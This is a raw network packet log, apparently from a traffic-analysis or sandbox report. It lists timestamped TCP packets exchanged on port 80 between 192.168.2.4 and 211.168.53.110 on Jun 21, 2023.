                                                                                                  Jun 21, 2023 20:23:53.816525936 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:53.816574097 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:53.816580057 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:53.816580057 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:53.818826914 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.072918892 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.072982073 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.073030949 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.073082924 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.073107004 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.073179960 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.075768948 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.075820923 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.075870037 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.075911999 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.075917959 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.075968027 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076018095 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076050043 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076071024 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076081038 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076121092 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076169968 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076184988 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076220036 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076302052 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076436996 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076545954 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076626062 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076632023 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076682091 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076730967 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076740026 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076781988 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076833963 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076881886 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076891899 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076930046 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.076961040 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.076977968 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077027082 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077074051 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077076912 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077126026 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077127934 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077174902 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077224016 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077270985 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077295065 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077318907 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077323914 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077368021 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077414036 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077430964 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077462912 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077510118 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077518940 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077558994 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077608109 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077625036 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077656984 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077707052 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077711105 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077755928 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077802896 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077851057 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077861071 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077898979 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077929974 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.077946901 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.077996969 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.078012943 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.078047037 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.078095913 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.078107119 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.078145981 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.078193903 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.078232050 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.078248024 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.078319073 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.332546949 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332637072 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332688093 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332737923 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332751036 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.332787991 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332837105 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332849026 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.332885981 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.332901955 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.332927942 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.332935095 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.333009958 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.337485075 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.337775946 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.337826014 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.337861061 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.337873936 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.337924004 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.337937117 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.337971926 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338021040 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338071108 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338083029 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338120937 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338131905 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338171005 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338221073 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338249922 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338275909 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338340044 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338340998 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338397026 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338444948 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338493109 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338502884 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338541031 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338588953 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338613033 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338638067 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338697910 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338712931 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338763952 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338794947 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338813066 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338861942 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338876009 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.338912010 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338960886 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.338972092 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339011908 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339062929 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339112043 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339140892 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339162111 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339184999 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339210987 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339260101 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339282036 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339309931 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339360952 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339406013 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339410067 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339459896 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339500904 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339509010 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339559078 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339607000 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339629889 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339656115 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339704037 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339720964 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339754105 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339762926 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339803934 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339854956 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339871883 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.339903116 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339951992 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.339978933 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340001106 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340049028 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340097904 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340107918 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340147972 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340197086 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340205908 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340245962 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340250969 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340317011 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340363979 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340378046 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340414047 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340461016 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340486050 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340508938 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340557098 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340584040 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340605021 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340655088 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340692997 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340703964 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340753078 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340801954 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340820074 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340851068 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340873957 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340899944 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340949059 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.340950966 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.340997934 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341047049 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341078043 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341100931 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341149092 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341156960 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341197968 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341247082 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341295004 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341305017 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341342926 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341391087 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341399908 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341439962 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341490030 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341495991 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341537952 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341546059 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341588020 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341635942 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341641903 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341684103 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341734886 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341742992 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341783047 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341830969 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341878891 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341890097 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.341927052 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341976881 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.341984034 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.342022896 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342072010 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342082977 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.342122078 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342170954 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342181921 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.342219114 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342268944 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342276096 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.342318058 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.342323065 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.453917027 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592190027 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592247009 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592339993 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592396021 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592396975 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592446089 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592495918 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592516899 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592544079 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592545986 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592595100 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592643023 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592654943 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592691898 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592741966 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592767000 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592792034 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592843056 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592859983 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.592894077 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592942953 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.592992067 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.593013048 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.593192101 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.601501942 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601557016 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601605892 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601650953 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.601654053 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601701975 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601749897 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601768017 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.601799965 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601849079 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601866007 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.601917982 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601977110 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.601984024 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602026939 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602076054 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602083921 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602168083 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602216959 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602231979 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602266073 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602315903 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602324009 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602365017 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602412939 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602427006 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602463961 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602529049 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602536917 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602588892 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602637053 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602654934 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602684975 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602734089 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602749109 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602782965 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602832079 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602838993 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602881908 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602930069 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.602937937 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.602991104 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603060007 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603060007 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.603115082 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603163958 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603176117 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.603213072 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603260040 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603269100 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.603310108 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603358030 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603362083 CEST4970080192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:54.603405952 CEST8049700211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:54.603452921 CEST8049700211.168.53.110192.168.2.4
